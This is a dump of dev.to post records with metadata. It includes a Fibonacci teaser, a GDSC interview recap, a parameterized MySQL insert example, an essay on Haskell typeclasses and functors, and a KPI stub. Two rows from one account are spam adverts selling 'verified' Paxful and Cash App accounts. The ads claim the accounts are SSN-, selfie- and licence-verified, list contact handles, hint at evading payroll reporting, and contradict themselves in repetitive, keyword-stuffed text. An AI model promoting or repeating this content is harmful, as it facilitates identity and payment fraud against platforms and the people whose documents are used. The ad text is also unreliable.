Dataset columns:

| column | type | min | max |
| --- | --- | --- | --- |
| id | int64 | 5 | 1.93M |
| title | string (length) | 0 | 128 |
| description | string (length) | 0 | 25.5k |
| collection_id | int64 | 0 | 28.1k |
| published_timestamp | timestamp[s] | | |
| canonical_url | string (length) | 14 | 581 |
| tag_list | string (length) | 0 | 120 |
| body_markdown | string (length) | 0 | 716k |
| user_username | string (length) | 2 | 30 |
**id:** 1,909,150
**title:** Buy Verified Paxful Account
**description:** https://dmhelpshop.com/product/buy-verified-paxful-account/ Buy Verified Paxful Account There are...
**collection_id:** 0
**published_timestamp:** 2024-07-02T17:15:25
**canonical_url:** https://dev.to/bikacaj604/buy-verified-paxful-account-1m23
**tag_list:** tutorial, react, python, ai
**user_username:** bikacaj604
**id:** 1,909,147
**title:** Unveiling the Fibonacci Sequence in C Programming
**description:** **What is the Fibonacci Series?** The Fibonacci series is a sequence of numbers where each number is the...
**collection_id:** 0
**published_timestamp:** 2024-07-02T17:05:29
**canonical_url:** https://dev.to/moksh57/unveiling-the-fibonacci-sequence-in-c-programming-218p
**What is the Fibonacci Series?**

The Fibonacci series is a sequence of numbers where each number is the sum of the two preceding ones. It starts from 0 and 1, and the series looks like this: 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, …

**Why is it Important?**

The Fibonacci series transcends its mathematical roots, manifesting in various natural phenomena and human creations. From the spiral patterns of galaxies to the arrangement of petals in flowers and the proportions of ancient architecture, the Fibonacci sequence embodies a universal pattern recognized across disciplines. In art, its rhythmic progression and harmonious proportions have inspired countless works. In computer science, Fibonacci numbers serve as a foundation for efficient problem-solving techniques, from dynamic programming to optimizing recursive functions. Understanding and generating the Fibonacci series not only deepens one's grasp of mathematical concepts but also nurtures an appreciation for the intricate patterns woven into our world. It encourages creativity in problem-solving and fosters a deeper connection between mathematics and its practical applications.

Read More: https://mokshelearning.blogspot.com/2024/07/18-Program-FibonacciSeries.html
**user_username:** moksh57
**id:** 1,909,148
**title:** My GDSC Lead Interview 2024
**description:** Okay so let me go step by step... Decoding the GDSC Lead Interview: The email arrived,...
**collection_id:** 0
**published_timestamp:** 2024-07-02T17:04:27
**canonical_url:** https://dev.to/kaustubhpaul18/my-gdsc-lead-interview-2024-56n7
**tag_list:** google, interview, googlecloud
Okay so let me go step by step...

## Decoding the GDSC Lead Interview:

The email arrived, crisp and official: **"GDSC Lead Interview Invitation."** My heart pounded with a mix of excitement and nervousness. Leading a Google Developer Student Clubs (GDSC) chapter was a dream I'd nurtured for a while, and the interview was the gateway. Here's a breakdown of that experience, with tips for future GDSC lead applicants.

## Before the Interview:

The days leading up to the interview were a whirlwind of preparation. I visited online resources for common GDSC lead interview questions, revisited the GDSC mission, and familiarized myself with Google's developer tools and resources. Most importantly, I reflected on my own experiences: _past leadership roles, technical skills, and ideas for the GDSC chapter._ I brushed up my knowledge of basic computer science topics and prepared myself to stay confident. I also talked with my current GDSC Lead, and she encouraged me before the interview.

## The Interview Day:

Nerves and excitement were on another level that day. The interview platform buzzed with anticipation. My interviewer was friendly and encouraging. The interview itself was a mix of different sections:

- **_Self-Introduction:_** This was a chance to showcase my passion for technology and my vision for the GDSC chapter. I gave a brief introduction about myself, covering the important parts such as my technical skills, and since I was currently serving as the Management Lead in the GDSC of my college, I shared some of my leadership experiences. Overall, this section eased my fear a bit and I was able to be more comfortable in front of them.
- **_Technical Knowledge:_** There were basic questions on programming concepts, data structures and algorithms, and OOPS. Brushing up on these beforehand definitely helped! Moreover, since I was a daily grinder of Google Cloud Arcade games, I was asked some core questions on GCP, including its tools and how to use them. I answered confidently, as everything was within my domain. Then I was asked about my projects, and I shared my GitHub repository, which contained a few of them. Here are some of the questions I was asked:
  1. _What do you know about OOPS?_
  2. _What are data structures and algorithms?_
  3. _Which Google tools do we use in our daily life?_
  4. _What are the 4 pillars of OOPS?_
  5. _What is the time complexity of Bubble Sort?_
- **_Leadership Experience:_** Here, I spoke about past leadership roles (even if they weren't technical) and how I fostered teamwork and achieved goals. Since I was the current Management Lead, I was responsible for hosting events, and I shared my experience of hosting some past events that went smoothly. Highlighting problem-solving skills was also important, along with the ability to mentor juniors as well as batchmates.
- **_GDSC Vision:_** This section was about outlining my plans for the chapter. I spoke about workshops, events, and initiatives I wanted to implement, keeping the specific needs of our student body in mind. Here I faced some really interesting and tricky questions through which the interviewer tested my skills in running a GDSC chapter. In short, this section is the real assessment of your character and innovation. To give an overview: I was put in certain situations and a problem was pitched to me, for which I was expected to give a solution keeping the community guidelines in mind.
  1. _If you become a GDSC Lead, what will be your primary target in setting up the chapter?_
  2. _If two of your core team members have an issue with each other just before a big event, what steps will you take and how will you deal with it?_
  3. _If an emergency situation occurs with an attendee during an ongoing event, what measures will you take as a GDSC Lead?_
  4. _What checkboxes will you tick before hosting a full-fledged offline event?_
- **_Open Discussion:_** This final part allowed me to ask questions about the GDSC program and the role itself. It's a great opportunity to show your genuine interest and initiative, and to clear any doubts with the interviewer.

## Beyond the Interview: Takeaways

The GDSC lead interview was a valuable experience, even if the outcome isn't yet known. It made me articulate my goals, refine my technical knowledge, and solidify my vision for the GDSC chapter. Here are some key takeaways:

- **Preparation is key:** Research GDSC, practice interview questions, and be ready to showcase your skills and passion. You may be asked about current technological affairs, so stay up to date with current technologies.
- **Be confident:** Even if you're nervous, project confidence and enthusiasm. Your passion for technology and the GDSC mission will shine through.
- **Be honest:** The GDSC lead interview is primarily an assessment of the candidate's character, so you have to be very honest.
- **Highlight your strengths:** Focus on experiences that demonstrate leadership, problem-solving, and teamwork skills.
- **Be creative:** When outlining your vision, think outside the box and propose unique and engaging events for the GDSC chapter.
- **No negative answers:** Even if you get stuck on a question, don't just say _"I don't know the answer"_ straightaway; it leaves a negative impression. Instead, give a polite and positive answer that conveys that even though you don't know this specific thing, you're eager to learn about it.

**_NOTE:_** _Whether you secure the lead role or not, the GDSC interview process is a stepping stone. It cultivates valuable skills and gives you a deeper understanding of the GDSC program. So, if you're passionate about technology and want to build a vibrant developer community on campus, go for it!!_
**user_username:** kaustubhpaul18
**id:** 1,909,146
**title:** Buy verified cash app account
**description:** https://dmhelpshop.com/product/buy-verified-cash-app-account/ Buy verified cash app account Cash...
**collection_id:** 0
**published_timestamp:** 2024-07-02T17:02:30
**canonical_url:** https://dev.to/bikacaj604/buy-verified-cash-app-account-4kjf
**tag_list:** webdev, javascript, beginners, programming
ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-cash-app-account/\t\n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d2amspvmsrtm179x08ox.png)\n\n\n\nBuy verified cash app account\nCash app has emerged as a dominant force in the realm of mobile banking within the USA, offering unparalleled convenience for digital money transfers, deposits, and trading. As the foremost provider of fully verified cash app accounts, we take pride in our ability to deliver accounts with substantial limits. Bitcoin enablement, and an unmatched level of security.\n\nOur commitment to facilitating seamless transactions and enabling digital currency trades has garnered significant acclaim, as evidenced by the overwhelming response from our satisfied clientele. Those seeking buy verified cash app account with 100% legitimate documentation and unrestricted access need look no further. Get in touch with us promptly to acquire your verified cash app account and take advantage of all the benefits it has to offer.\n\nWhy dmhelpshop is the best place to buy USA cash app accounts?\nIt’s crucial to stay informed about any updates to the platform you’re using. If an update has been released, it’s important to explore alternative options. Contact the platform’s support team to inquire about the status of the cash app service.\n\nClearly communicate your requirements and inquire whether they can meet your needs and provide the buy verified cash app account promptly. 
If they assure you that they can fulfill your requirements within the specified timeframe, proceed with the verification process using the required documents.\n\nOur account verification process includes the submission of the following documents: [List of specific documents required for verification].\n\nGenuine and activated email verified\nRegistered phone number (USA)\nSelfie verified\nSSN (social security number) verified\nDriving license\nBTC enable or not enable (BTC enable best)\n100% replacement guaranteed\n100% customer satisfaction\nWhen it comes to staying on top of the latest platform updates, it’s crucial to act fast and ensure you’re positioned in the best possible place. If you’re considering a switch, reaching out to the right contacts and inquiring about the status of the buy verified cash app account service update is essential.\n\nClearly communicate your requirements and gauge their commitment to fulfilling them promptly. Once you’ve confirmed their capability, proceed with the verification process using genuine and activated email verification, a registered USA phone number, selfie verification, social security number (SSN) verification, and a valid driving license.\n\nAdditionally, assessing whether BTC enablement is available is advisable, buy verified cash app account, with a preference for this feature. It’s important to note that a 100% replacement guarantee and ensuring 100% customer satisfaction are essential benchmarks in this process.\n\nHow to use the Cash Card to make purchases?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card. Alternatively, you can manually enter the CVV and expiration date. 
How To Buy Verified Cash App Accounts.\n\nAfter submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a buy verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account.\n\nWhy we suggest to unchanged the Cash App account username?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card.\n\nAlternatively, you can manually enter the CVV and expiration date. After submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account. Purchase Verified Cash App Accounts.\n\nSelecting a username in an app usually comes with the understanding that it cannot be easily changed within the app’s settings or options. This deliberate control is in place to uphold consistency and minimize potential user confusion, especially for those who have added you as a contact using your username. In addition, purchasing a Cash App account with verified genuine documents already linked to the account ensures a reliable and secure transaction experience.\n\n \n\nBuy verified cash app accounts quickly and easily for all your financial needs.\nAs the user base of our platform continues to grow, the significance of verified accounts cannot be overstated for both businesses and individuals seeking to leverage its full range of features. 
How To Buy Verified Cash App Accounts.\n\nFor entrepreneurs, freelancers, and investors alike, a verified cash app account opens the door to sending, receiving, and withdrawing substantial amounts of money, offering unparalleled convenience and flexibility. Whether you’re conducting business or managing personal finances, the benefits of a verified account are clear, providing a secure and efficient means to transact and manage funds at scale.\n\nWhen it comes to the rising trend of purchasing buy verified cash app account, it’s crucial to tread carefully and opt for reputable providers to steer clear of potential scams and fraudulent activities. How To Buy Verified Cash App Accounts.  With numerous providers offering this service at competitive prices, it is paramount to be diligent in selecting a trusted source.\n\nThis article serves as a comprehensive guide, equipping you with the essential knowledge to navigate the process of procuring buy verified cash app account, ensuring that you are well-informed before making any purchasing decisions. Understanding the fundamentals is key, and by following this guide, you’ll be empowered to make informed choices with confidence.\n\n \n\nIs it safe to buy Cash App Verified Accounts?\nCash App, being a prominent peer-to-peer mobile payment application, is widely utilized by numerous individuals for their transactions. However, concerns regarding its safety have arisen, particularly pertaining to the purchase of “verified” accounts through Cash App. This raises questions about the security of Cash App’s verification process.\n\nUnfortunately, the answer is negative, as buying such verified accounts entails risks and is deemed unsafe. Therefore, it is crucial for everyone to exercise caution and be aware of potential vulnerabilities when using Cash App. 
How To Buy Verified Cash App Accounts.\n\nCash App has emerged as a widely embraced platform for purchasing Instagram Followers using PayPal, catering to a diverse range of users. This convenient application permits individuals possessing a PayPal account to procure authenticated Instagram Followers.\n\nLeveraging the Cash App, users can either opt to procure followers for a predetermined quantity or exercise patience until their account accrues a substantial follower count, subsequently making a bulk purchase. Although the Cash App provides this service, it is crucial to discern between genuine and counterfeit items. If you find yourself in search of counterfeit products such as a Rolex, a Louis Vuitton item, or a Louis Vuitton bag, there are two viable approaches to consider.\n\n \n\nWhy you need to buy verified Cash App accounts personal or business?\nThe Cash App is a versatile digital wallet enabling seamless money transfers among its users. However, it presents a concern as it facilitates transfer to both verified and unverified individuals.\n\nTo address this, the Cash App offers the option to become a verified user, which unlocks a range of advantages. Verified users can enjoy perks such as express payment, immediate issue resolution, and a generous interest-free period of up to two weeks. With its user-friendly interface and enhanced capabilities, the Cash App caters to the needs of a wide audience, ensuring convenient and secure digital transactions for all.\n\nIf you’re a business person seeking additional funds to expand your business, we have a solution for you. Payroll management can often be a challenging task, regardless of whether you’re a small family-run business or a large corporation. How To Buy Verified Cash App Accounts.\n\nImproper payment practices can lead to potential issues with your employees, as they could report you to the government. 
However, worry not, as we offer a reliable and efficient way to ensure proper payroll management, avoiding any potential complications. Our services provide you with the funds you need without compromising your reputation or legal standing. With our assistance, you can focus on growing your business while maintaining a professional and compliant relationship with your employees. Purchase Verified Cash App Accounts.\n\nCash App has emerged as a leading peer-to-peer payment method, catering to a wide range of users. With its seamless functionality, individuals can effortlessly send and receive cash in a matter of seconds, bypassing the need for a traditional bank account or social security number. Buy verified cash app account.\n\nThis accessibility makes it particularly appealing to millennials, addressing a common challenge they face in accessing physical currency. As a result, Cash App has established itself as a preferred choice among diverse audiences, enabling swift and hassle-free transactions for everyone. Purchase Verified Cash App Accounts.\n\n \n\nHow to verify Cash App accounts\nTo ensure the verification of your Cash App account, it is essential to securely store all your required documents in your account. This process includes accurately supplying your date of birth and verifying the US or UK phone number linked to your Cash App account.\n\nAs part of the verification process, you will be asked to submit accurate personal details such as your date of birth, the last four digits of your SSN, and your email address. If additional information is requested by the Cash App community to validate your account, be prepared to provide it promptly. Upon successful verification, you will gain full access to managing your account balance, as well as sending and receiving funds seamlessly. 
Buy verified cash app account.\n\n \n\nHow is cash used for international transactions?\nExperience the seamless convenience of this innovative platform that simplifies money transfers to the level of sending a text message. It effortlessly connects users within the familiar confines of their respective currency regions, primarily in the United States and the United Kingdom.\n\nNo matter if you’re a freelancer seeking to diversify your clientele or a small business eager to enhance market presence, this solution caters to your financial needs efficiently and securely. Embrace a world of unlimited possibilities while staying connected to your currency domain. Buy verified cash app account.\n\nUnderstanding the currency capabilities of your selected payment application is essential in today’s digital landscape, where versatile financial tools are increasingly sought after. In this era of rapid technological advancements, being well-informed about platforms such as Cash App is crucial.\n\nAs we progress into the digital age, the significance of keeping abreast of such services becomes more pronounced, emphasizing the necessity of staying updated with the evolving financial trends and options available. Buy verified cash app account.\n\nOffers and advantages of buying Cash App accounts cheap\nWith Cash App, the possibilities are endless, offering numerous advantages in online marketing, cryptocurrency trading, and mobile banking while ensuring high security. As a top creator of Cash App accounts, our team possesses unparalleled expertise in navigating the platform.\n\nWe deliver accounts with maximum security and unwavering loyalty at competitive prices unmatched by other agencies. Rest assured, you can trust our services without hesitation, as we prioritize your peace of mind and satisfaction above all else.\n\nEnhance your business operations effortlessly by utilizing the Cash App e-wallet for seamless payment processing, money transfers, and various other essential tasks. 
Amidst a myriad of transaction platforms in existence today, the Cash App e-wallet stands out as a premier choice, offering users a multitude of functions to streamline their financial activities effectively. Buy verified cash app account.\n\nTrustbizs.com stands by the Cash App’s superiority and recommends acquiring your Cash App accounts from this trusted source to optimize your business potential.\n\nHow Customizable are the Payment Options on Cash App for Businesses?\nDiscover the flexible payment options available to businesses on Cash App, enabling a range of customization features to streamline transactions. Business users have the ability to adjust transaction amounts, incorporate tipping options, and leverage robust reporting tools for enhanced financial management.\n\nExplore trustbizs.com to acquire verified Cash App accounts with LD backup at a competitive price, ensuring a secure and efficient payment solution for your business needs. Buy verified cash app account.\n\nDiscover Cash App, an innovative platform ideal for small business owners and entrepreneurs aiming to simplify their financial operations. With its intuitive interface, Cash App empowers businesses to seamlessly receive payments and effectively oversee their finances. Emphasizing customization, this app accommodates a variety of business requirements and preferences, making it a versatile tool for all.\n\nWhere To Buy Verified Cash App Accounts\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. 
It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nThe Importance Of Verified Cash App Accounts\nIn today’s digital age, the significance of verified Cash App accounts cannot be overstated, as they serve as a cornerstone for secure and trustworthy online transactions.\n\nBy acquiring verified Cash App accounts, users not only establish credibility but also instill the confidence required to participate in financial endeavors with peace of mind, thus solidifying its status as an indispensable asset for individuals navigating the digital marketplace.\n\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nConclusion\nEnhance your online financial transactions with verified Cash App accounts, a secure and convenient option for all individuals. By purchasing these accounts, you can access exclusive features, benefit from higher transaction limits, and enjoy enhanced protection against fraudulent activities. Streamline your financial interactions and experience peace of mind knowing your transactions are secure and efficient with verified Cash App accounts.\n\nChoose a trusted provider when acquiring accounts to guarantee legitimacy and reliability. In an era where Cash App is increasingly favored for financial transactions, possessing a verified account offers users peace of mind and ease in managing their finances. 
Make informed decisions to safeguard your financial assets and streamline your personal transactions effectively.\n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 ‪(980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com\n\n\n\n"
bikacaj604
1,908,006
Backend and solving problems
I was building a grocery app. The grocery app required a feature that allowed store managers to add...
0
2024-07-01T17:21:30
https://dev.to/uti/backend-and-solving-problems-2mff
I was building a grocery app. The grocery app required a feature that allowed store managers to add new products dynamically. This task required a deep understanding of database operations and efficient coding practices. The requirements for the feature included input validation, database interaction, error handling, and ensuring that each product had a unique combination of name and category, preventing duplicate entries. The database schema for the products table needed to be well-defined, and a simplified version of the schema was used. The work involved the following steps: 1. Understanding the requirements: Gathering the requirements for the feature, such as input validation, database interaction, and error handling. 2. Setting up the database schema: Creating a well-defined schema for the products table. 3. Writing the Python code: Importing necessary libraries, setting up the database connection, and defining the Product Model class. 4. Testing the solution: Testing the solution thoroughly to ensure it handled all edge cases, including missing details, duplicate entries, and incorrect data types. 5. Using a parameterized query. For example: ```python import mysql.connector try: connection = mysql.connector.connect(host='localhost', database='python_db', user='root') cursor = connection.cursor(prepared=True) # Parameterized query sql_insert_query = """ INSERT INTO Products (id, Name, price) VALUES(%s,%s,%s)""" # tuples to insert at the placeholders tuple1 = (1, "Json", 9000) tuple2 = (2, "Milk", 1200) cursor.execute(sql_insert_query, tuple1) cursor.execute(sql_insert_query, tuple2) connection.commit() print("Data inserted successfully into the Products table using the prepared statement") except mysql.connector.Error as error: print("Parameterized query failed: {}".format(error)) finally: if connection.is_connected(): cursor.close() connection.close() print("MySQL connection is closed") ``` The code performed well, providing appropriate error messages and successfully adding valid products to the database. 
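The snippet above inserts products but does not itself enforce the unique (name, category) requirement stated earlier. Here is a minimal, self-contained sketch of that rule — using `sqlite3` instead of MySQL so it runs without a server, with hypothetical column names and sample values:

```python
import sqlite3

# In-memory database so the example is self-contained (no MySQL server needed).
conn = sqlite3.connect(":memory:")
cur = conn.cursor()

# UNIQUE (name, category) enforces the "no duplicate product" rule at the schema level.
cur.execute("""
    CREATE TABLE Products (
        id INTEGER PRIMARY KEY,
        name TEXT NOT NULL,
        category TEXT NOT NULL,
        price REAL NOT NULL,
        UNIQUE (name, category)
    )
""")

def add_product(name, category, price):
    """Insert a product; report a duplicate instead of crashing."""
    try:
        # Parameterized query, as in the article, to avoid SQL injection.
        cur.execute(
            "INSERT INTO Products (name, category, price) VALUES (?, ?, ?)",
            (name, category, price),
        )
        conn.commit()
        return True
    except sqlite3.IntegrityError:
        # The UNIQUE constraint was violated: same (name, category) already exists.
        return False

print(add_product("Milk", "Dairy", 1.50))   # True: first insert succeeds
print(add_product("Milk", "Dairy", 1.75))   # False: duplicate (name, category) rejected
```

On a MySQL backend the same idea applies: add a `UNIQUE (Name, Category)` constraint to the table and catch `mysql.connector.IntegrityError` around the insert.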
Input validation ensured that all necessary product details (id, Name, price) were provided, while database interaction ensured that the new product was inserted without causing any integrity issues. Error handling handled cases where the product already exists or required fields were missing. The database schema for the products table was well-defined, with a simplified version of the schema used. The code was tested on MySQL to ensure that the solution was effective and efficient. In conclusion, the grocery app required a dynamic product insertion feature that allowed store managers to add new products dynamically. It involved understanding the requirements, setting up the database schema, and testing the solution thoroughly to ensure it effectively handles edge cases and ensures seamless and robust insertion of products into the database. HNG Internship Programmes are a great option for anyone looking to enhance their development abilities in a disciplined and encouraging setting. Numerous tools and possibilities are provided by these programmes, such as networking on the HNG Premium Workspace, CV evaluations, and job offers. Visit the HNG Premium website at https://hng.tech/premium and the HNG Internship page at https://hng.tech/internship to find out more.
uti
1,909,145
Functional Patterns: Interfaces and Functors
This is part 3 of a series of articles entitled Functional Patterns. Make sure to check out the...
0
2024-07-02T17:00:57
https://dev.to/if-els/functional-patterns-interfaces-and-functors-359e
programming, haskell, learning, go
> This is part 3 of a series of articles entitled *Functional Patterns*. > > Make sure to check out the rest of the articles! > > 1. [The Monoid](https://dev.to/if-els/functional-patterns-the-monoid-22ef) > 2. [Compositions and Implicitness](https://dev.to/if-els/functional-patterns-composition-and-implicitness-4n08) ## Generics and Typeclasses To be correct, a function must type-check, and is therefore provable. But in the case of *generalized* functions, meant to deal with various types, this immediately shows as a pain point. To make a `double` function work across types, we would have to define them separately! ```haskell doubleInt :: Int -> Int doubleChar :: Char -> Char doubleFloat :: Float -> Float -- ... ``` And for any self-respecting programmer, you should already be finding yourself absolutely **appalled** by this. We'd just learned about a pattern for building case-handling using *partial application* but we can't really apply it here since our type signatures won't allow that, and our function **has** to type-check. Thankfully, this is already a feature in most modern programming languages. We are allowed to define a `generic` type. A *hypothetical* type that only has to verify matching positions in the function signature or variable declarations. ```cpp // c++ ("double" is a reserved keyword, so the function needs another name) template <typename T> T double_it(T x) { return x*2; } ``` ```rust // rust fn double<T>(x: T) -> T { return x*2; } ``` ```hs -- haskell double :: a -> a double = (*2) -- partially applied multiplication ``` And that should solve our problem! As long as the compiler is given these *generics*, it can figure out what types it has to use at run-time (Rust actually still resolves this at compile-time!). However, even though there is merit in this implementation— there is still a glaring flaw, one that gets pointed out by the Haskell compiler (and by Rust's, which likewise rejects the unbounded `x*2`), as the above Haskell code actually raises an error. > No instance for ‘Num a’ arising from a use of ‘*’... 
We've defined a type, but we aren't always going to be sure this type has the *capacity* to be doubled. Sure, this immediately works on numbers, but what's stopping the user from calling `double` on a String? A list? Without a predefined *method* for doubling these types, they should not be allowed as arguments, in the first place. So contrary to the name of *generics*, we're going to have to get a bit more *specific, but still general*. This is where **typeclasses** come in, or also known more commonly in the imperative world as **interfaces**. Again, if you're using any language that has been made later than C++, you should have access to some implementation of interfaces. Interfaces, compared to generics, specify some sort of *capability* of types that can be *categorized* under it. Here is a fixed version of our previous code. ```haskell double :: (Num a) => a -> a -- a has to be of typeclass Num double = (*2) ``` or in Go: ```go // We first create an interface that is the union of floats and integers. type Num interface { ~int | ~float64 // ... plus all other num types } func double[T Num](a T) T { return a * 2 } ``` For brevity's sake we'll say that Haskell doesn't really deal with embedded state in their interfaces, such as Typescript's and Go's interfaces (a constraint brought upon by pure functional rules). So even though you might be able to define required *attributes* of a type to be under an interface, know that *pure* interfaces only have to define **functions** or **capabilities** of the type. And by capabilities in this context, we are talking about if the type has a *dependency* in the form of a doubling function— is the compiler *taught* how to double it? ```hs import Control.Monad (join) class CanDouble a where double :: a -> a instance CanDouble Int where double = (* 2) instance CanDouble Float where double = (* 2) -- we tell the compiler that doubling a string is concatenating it to itself. 
instance CanDouble String where double = join (++) -- W-combinator, f x = f(x)(x) ``` And now we're pretty much back to where we were at the start when it comes to code repetition, isn't that funny? But this fine-grained control of implementation is actually where the power of this comes in. If you've ever heard of the *Strategy* pattern before, this is pretty much it, in the functional sense. ```hs quadruple :: (CanDouble a) => a -> a quadruple = double . double leftShift :: (CanDouble a) => a -> Int -> a leftShift n e | e <= 0 = n | otherwise = leftShift (double n) $ e - 1 ``` These functions type-check now, all because we *taught* the compiler how to double types under the `CanDouble` typeclass. We can achieve something similar in Go, a big caveat being that we can only define interface methods on *non-primitive* types. Meaning, we have to define wrapper types for primitive types. ```go type CanDouble interface { double() CanDouble } type String string type Number interface { ~int | ~float64 // ... plus all other num types } type Num[T Number] struct { v T } // the methods return CanDouble so that String and Num[T] actually satisfy the interface func (s String) double() CanDouble { return s + s } func (n Num[T]) double() CanDouble { return Num[T]{n.v * 2} } func quadruple(n CanDouble) CanDouble { return n.double().double() } func leftShift(n CanDouble, e uint) CanDouble { for i := uint(0); i < e; i++ { n = n.double() } return n } ``` This honestly is kind of a bummer, but no worries, as most of the time you're going to be dealing with interfaces, it will be with custom types and structs. ## Categories > Category theory is a general theory of mathematical structures and their relations. We've briefly brushed upon *category theory* back in `The Monoid`, and we'd like to keep it that way, only close encounters. I will be referencing it here and there, but rest assured: you won't need to have a background in it to grasp whatever follows. However, there is no doubt that we have encountered *sets* before. 
As a brief recap, sets can be thought of as a **collection** of elements. These elements can be absolutely *anything*. ``` { 0, 1, 2, 3, ... } -- the set of natural numbers { a, b, c, ..., z} -- the set of lowercase letters { abs, min, max, ... } -- the set of `Math` functions in Javascript { {0, 1}, {a, b}, {abs, min} } -- the set of sets containing the first 2 elements of the above sets ``` Adding on to that, we have these things called **morphisms**, which we can think of as mappings between elements. > Very big omission here on the definitions of morphisms, in that they are *relations* between elements, and not strictly functions/mappings, > you can look it up if you are curious. We can say a function like `toUpper()` is a morphism from lowercase letters *to* uppercase letters, just like how we can say `double = (*2)` is a morphism from numbers *to* numbers (specifically even numbers). And if we group these together, the set of elements and their morphisms, we end up with a *category*. > Again, omission, categories have more constraints such as a Composition partial morphism and identities. But these properties are not that relevant here. If you have a keen eye for patterns you'd see that there is a parallel to be drawn between categories and our interfaces! The *objects* (formal name for a category's set of elements) of our category are our *instances*, and our *implementations* are our *morphisms*! ```hs class CanDouble a where double :: a -> a -- `Int` is our set of elements { ... -1, 0, 1, ... } -- `(* 2)` is a morphism we defined -- ... (other omissions) -- ... -- Therefore, `CanDouble Int` is a Category. instance CanDouble Int where double = (* 2) ``` ## Functors Man, that was a lot to take in. Here's a little bit more extra: A **Functor** is a type of function (also known as a mapping) from a *category* to *another category* (which can include itself; these are called *endofunctors*). 
What this essentially means is that it is a transformation on some category that maps every element to a corresponding element, and every morphism to a corresponding morphism. An output category based on the input category. In Haskell, categories that can be transformed by a functor are described by the following typeclass (which also makes it a category in and of itself, that's for you to ponder): ```hs class Functor f where fmap :: (a -> b) -> f a -> f b -- ... ``` `f` here is what we call a *type constructor*. By itself it isn't a *concrete* type, until it is accompanied by a concrete type. An example of this would be how an *array* isn't a type, but an array *of `Int`* is. The most common form of a type constructor is as a *data type* (a struct). From this definition we can surmise that all we need to give to this function `fmap` is a function `(a -> b)` (which is our actual functor, don't think about the naming too much), and this would transform a type `f a` to type `f b`, a different type in the *same* category. > Yes, this means Haskell's `Functor` typeclass is actually a definition for *endofunctors*, woops! ![image](https://github.com/44mira/articles/assets/116419708/fcef5a8c-95f1-420e-959b-d5a17bdb6f1d) If all of that word vomit was scary, a very oversimplified version of the requirement of the `Functor` typeclass is that you are able to `map` values to other values in the same category. Arguably the most common `Functor` we use are arrays: ```hs instance Functor [] where -- fmap f [] = [] -- fmap f (a:as) = f a : fmap f as -- simplified fmap :: (a -> b) -> [a] -> [b] fmap f arr = map f arr ``` We are able to map an array of `[a]` to `[b]` using our function (or functor) `f`. The type constructor `[]` serves as our category, and so our functor is a transformation from one type of an array to another. 
So, formally: the `map` function, though commonly encountered nowadays in other languages and declarative frameworks such as *React*, is simply the application of an *endofunctor* on the category of *arrays*. Wow. That is certainly a description. Here are more examples of functors in action: ```go // Go type Functor[T any] interface { fmap(func(T) T) Functor[T] } type Pair[T any] struct { a T b T } type List[T any] struct { get []T } // Applying a functor to a Pair is applying the function // to both elements (value receivers returning Functor[T], so Pair and List satisfy the interface) func (p Pair[T]) fmap(f func(T) T) Functor[T] { return Pair[T]{ // apply f to both a and b f(p.a), f(p.b), } } func (a List[T]) fmap(f func(T) T) Functor[T] { res := make([]T, len(a.get)) // create an array of size len(a.get) for i, v := range a.get { res[i] = f(v) } return List[T]{res} } ``` ```hs -- haskell data Pair t = P (t, t) instance Functor Pair where fmap f (P (x, y)) = P (f x, f y) ``` So all that it takes to fall under the `Functor` (again, endofunctor) interface is to have a definition on how to *map* the contents of the struct to any other type (including its own). > This is another simplification; functors also need to preserve identity and composition. To put it simply, whenever you do a `map`, you're not only transforming the elements of your array (or struct), you're also transforming the functions you are able to apply on this array (or struct). This is what we mean by mapping **both** *objects* and *morphisms* to different matching objects and morphisms in the *same* category. This is important to note as even though we end up in the same category (in this context, we map an array, which results in another array), these might have differing functions or implementations available to them (though most of them will be mapped to their relatively equivalent functions, such as a `reverse` on an array of `Int` to `reverse` on an array of `Float`). 
> This is where the oversimplification kinda messes us up a bit, because if we follow only our definition, we could say that reducing functions such as `sum` and `concat` are functors from the category of arrays to atoms, but this isn't necessarily true, as functors also require that you *preserve* the *categorical structure*, which won't be covered in this article series as that's way too deeply rooted in category theory. --- Apologies if this article contained **way** more math than applications, but understanding these definitions will help us greatly in understanding the harder patterns later in this series, namely `Applicatives` and finally `Monads`. > A monad is a *monoid* in the *category* of *endofunctors*. We're getting there! :>
if-els
1,909,144
Essentialism in KPIs: Focusing on Key Metrics for Software Development Success
Introduction In the fast-paced world of software development, tracking progress and...
0
2024-07-02T17:00:44
https://dev.to/davitacols/essentialism-in-kpis-focusing-on-key-metrics-for-software-development-success-mdo
softwaredevelopment, software, kpi, webdev
